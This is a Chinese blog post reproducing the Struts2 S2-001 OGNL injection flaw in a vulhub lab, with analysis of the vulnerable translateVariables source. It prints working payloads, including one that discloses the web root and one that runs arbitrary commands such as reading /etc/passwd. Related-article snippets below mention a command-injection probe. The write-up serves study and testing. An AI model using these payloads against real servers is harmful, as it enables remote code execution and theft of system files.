S2-001漏洞靶场复现

最新推荐文章于 2024-01-05 18:02:15 发布
最新推荐文章于 2024-01-05 18:02:15 发布
阅读量466 收藏
点赞数
分类专栏: 网络安全 文章标签: 渗透测试 靶机 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/122795903
版权

1、漏洞描述

Struts2是一个基于MVC设计模式Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

WebWork 2.1+ 和 Struts 2 的 'altSyntax' 特性允许将 OGNL 表达式插入文本字符串并进行递归处理,这允许恶意用户提交一个字符串。如果用户提交表单验证失败,且提交的参数中包含一个 OGNL 表达式,服务器将执行该表达式。

2、影响版本

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

3、漏洞简单分析

  • 问题主要是出在translateVariables函数中,源码如下:

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;

        while (true) {
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;

            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);

                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                    o = evaluator.evaluate(o);
                }


                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }

                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }

                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }

        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

  • 此时expression%{password}

  • 经过while循环,此时varpassword

  • stack.findValue(var, asType);会返回password的值%{1+1},这个就是我们传入的payload:

  • 此后o%{1+1},再对o进行了一番处理后,payload经过result变量,最终成为expression的值:

  • 在完成后,进入下一个循环:

  • 并且在Object o = stack.findValue(var, asType);中完成了对payload的执行:

  • 总结:究其原因,在于在translateVariables函数中,递归解析了表达式,在处理完%{password}后将password的值直接取出并继续在while循环中解析,若用户输入的password是恶意的OGNL表达式,比如%{1+1},则得以解析执行。

4、漏洞复现

4.1 环境搭建

使用vulnhub进行搭建https://github.com/vulhub/vulhub

cd vulhub-master/struts2/s2-001

docker-compose build

docker-compose up -d

4.2 最简单POC语句尝试,输入%{1+1},语句成功执行

4.3 尝试获取Web路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

4.4 执行任意命令,只需修改命令加参数,例如new java.lang.String[]{"cat","/etc/passwd"}

%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

参考链接:

https://xz.aliyun.com/t/2044

https://xz.aliyun.com/t/2672#toc-2

https://www.freebuf.com/articles/web/280245.html

https://cwiki.apache.org/confluence/display/WW/S2-001

KALC
关注
专栏目录
命令执行漏洞—简单利用1(墨者靶场
weixin_44431280的博客
03-03 1800
命令执行漏洞—简单利用1(墨者靶场) 命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1556
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
S2-001漏洞分析
灰蜗牛
02-23 1322
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码。
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 6026
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
vulhub靶场框架漏洞复现手册(strusts2\shiro\weblogic)附工具链接
zwy15288408160的博客
12-15 1706
工具+手工复现vulhub靶场下的框架漏洞,包括struts2远程代码执行(2-029,s2-061,s2-001),shiro反序列化漏洞(CVE-2016-4437),weblogic反序列化漏洞(CVE-2017-10271,CVE-2018-2628,CVE-2018-2894,CVE-2020-14882,ssrf,weak-password)。持续更新中...持续更新中...
24个常见渗透测试漏洞靶场列表
一只臭皮匠的博客
09-09 6963
0x01 在线靶场 BUUCTF在线评测:https://buuoj.cn Vulhub漏洞环境集合:https://vulhub.org 韩国Webhacking:https://webhacking.kr 重生信息安全在线靶场:https://bc.csxa.cn 网络信息安全攻防学习平台:http://hackinglab.cn 墨者学院在线靶场:https://www.mozhe.cn/bug 封神台在线演练靶场:https://hack.zkaq.cn/battle 安鸾渗透实战平台:http:
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3902
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现
浅浅的博客
07-28 3165
Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现 一、漏洞描述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 二、漏洞影响版本 Apache Strut...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638)
qq_51577576的博客
10-17 660
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638) 在使用基于Jakarta插件的文件上传功能时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-013)复现
weixin_42079912的博客
08-09 555
S2-013漏洞原理:struts2的标签中 < s:a > 和 < s:url > 都有一个 includeParams 属性,可以设置成值none或get或all ,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。此时< s:a > 或< s:url >尝试去解析原始请求参数时,会导致OG...
S2-001 漏洞复现
qq_36594628的博客
07-23 485
S2-001 一、漏洞原理 ​ 因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 二、影响版本 ​ Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注:我的虚拟
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
wanan的博客
09-03 2042
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
墨者靶场 初级:Struts2远程代码执行漏洞S2-001
qq_43233085的博客
01-14 496
墨者靶场 初级:Struts2远程代码执行漏洞S2-001)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2目录遍历漏洞(S2-004); 3、...
web应用常见漏洞
qq_43590351的博客
09-11 812
web应用常见漏洞 <span style="color:red;">红色</span> 学习目标 章节 学习目标 ThinkPHP 远程代码执行 掌握 Think php框架 V2.x (和V5.0.20) 远程代码执行漏洞利用方式 Stuts2 代码执行漏洞 掌握 Stuts2 (CVE-2019-0230) 远程代码执行漏洞的利用方式 Shiro
S2-001 远程代码执行 漏洞复现
Senimo
07-27 2901
S2-001 远程代码执行 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 二、漏洞影响 三、漏洞复现 1
Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场
Love&Share
04-07 1959
与实际区别。
java struts2 漏洞复现合集
whatday的专栏
08-31 5736
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
Struts2 远程代码执行漏洞S2-001分析
最新发布
st3pby的博客
01-05 964
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
s2系列————s2-001叙利亚版本一键化操作
qq_54030686的博客
02-28 437
s2-001叙利亚版本一键化操作 s2-001漏洞 不过多介绍,使用vulhub搭建相应靶场即可,在linux下正常运行,在windows下有可能出现状态码为500的可能,在请求头中增加Content-Type:application/x-www-form-urlencoded属性值即可正常返回,本脚本使用python编写,回显过程中,会出现些问题,包括,jssionid未过滤,命令回显字母缺失等问题,故称:叙利亚版本 右边为实际值,左边为脚本输出值,看的 这个还是有蛮大区别的,但是命令回显肯定正常执行,用
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值